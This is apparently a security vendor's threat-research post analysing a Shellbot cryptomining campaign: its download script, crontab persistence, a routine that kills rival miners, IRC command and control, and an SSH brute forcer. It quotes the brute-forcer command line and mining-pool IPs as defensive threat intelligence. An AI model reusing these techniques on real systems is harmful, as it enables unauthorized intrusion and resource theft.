Inside an Active Shellbot Cryptomining Malware Campaign

Threat Stack’s Security Operations Center (SOC) recently discovered an ongoing and evolving cryptojacking campaign that leverages a new variant of the Shellbot malware, originally discovered by JASK in November 2018 and published in February 2019. In this new variant of the Shellbot campaign, Threat Stack has identified the addition of a new SSH brute force tool, a secondary command and control method, and the added ability to stop other cryptominers on infected servers.

See It In Action

Possible Initial Vector

Cloud Attack Step 1

A shell script named tddwrt7s.sh is downloaded to /dev/shm or /tmp. The shell script is then executed with seven different URLs containing the same file (dota.tar.gz) as arguments which contain the malware payload. The script chooses one of the URLs randomly, and then downloads the payload which is then uncompressed and executed.

Installation and Persistence

Cloud Attack Step 2

This campaign uses a series of scripts and executables to install and persist on a target system. The first shell script (either initall or init2) removes old installations of the malware and then runs the script init. This both installs the malware components and makes them persistent on the system by stepping through a series of subfolders (a,b,c) and overwriting crontab.

Cryptominer Killer Script

Cloud Attack Step 2

One of the more interesting parts of this malware campaign is that it checks to see whether there are other cryptominers on the system and stops them if there are. This would normally be considered a good thing if it didn’t turn around and install its own cryptominer on the system. This is accomplished by a 272-line shell script named init0.

Cryptominer Installation/Initialization

Cloud Attack Step 2

The cryptominer is initialized through two shell scripts named a and run. The shell script a creates a new shell script named upd and executes, which then executes run. The script run then runs either the 32-bit or 64-bit version of the cryptominer named anacron and cron respectively. There is also a script named stop which acts as a kill switch. The cryptominer makes connections to two MoneroHash IPs (107.191.99.221 and 107.191.99.95) and starts mining.

C2 Installation/Initialization

Cloud Attack Step 2

The initialization of the Command and Control component is accomplished through shell scripts also named a and run. The script a creates the script named sync which executes run. The scripts execute a packed perl script named rsync and an executable named ps. The perl script rsync allows Command and Control via IRC, and ps allows for SSH connections from malicious infrastructure and also locks users out of the system. There is also a kill switch script named stop.

C2 Summary

Cloud Attack Step 2

The Command and Control component consists of the files rsync and ps. The file rsync is a packed perl script which connects to a malicious IRC server which acts as the C2 infrastructure. It allows for both preconfigured commands and direct shell access. The file ps is likely used to establish another persistence mechanism by removing the compromised user’s .ssh folder and creating its own.

SSH Brute Forcer Installation/Initialization

Cloud Attack Step 2

The final component is the SSH brute forcer which, much like its compatriots, relies on a series of shell scripts to initialize. The shell script start is run by one of the init scripts; it then creates a new shell script named aptitude which runs the script named run. Then run executes a shell script named go.

SSH Brute Forcer Operation

Cloud Attack Step 2

The shell script go downloads a file containing an IP address which is named xtr. Then an IP and password list (named a and b respectively) is downloaded from the IP named in the xtr file. These files are renamed to ip and p and then passed to a shell script named tsm: timeout 90m ./tsm -t $threads -f 0 -s 10 -S 10 -p 0 p ip. This command starts the brute forcer, which runs for a set period of time and then restarts. Newer variations are set to run for 24 hours instead of 90 minutes.

Conclusion

Overall this is a sophisticated malware campaign that has been updated at least once during the investigation and will likely continue to be updated as time goes on. The main goal of this campaign appears to be monetary gain via cryptomining and propagating itself to other systems on the internet. However, the possibility of data exfiltration and/or lateral movement cannot be discounted as the malware appears to have the capability to perform more than just cryptomining.


Do We Catch It? Yes We Do!

The current form of the campaign will be detected by the Threat Stack Cloud Security Platform since it partially executes out of /tmp/ and downloads files via wget and cURL. While it has been detected in both live customer environments and test environments, the full level of detection will be dependent on the rulesets enabled.

Watch the Threat Briefing

A Threat Stack Security Analyst will walk through each step of the observed attack including the initial vector, malware campaign flow, and the actual log files and alerts triggered during the attack.

Read the Full Report

Including details of the malware components, the active cryptomining campaign flow, and future investigations.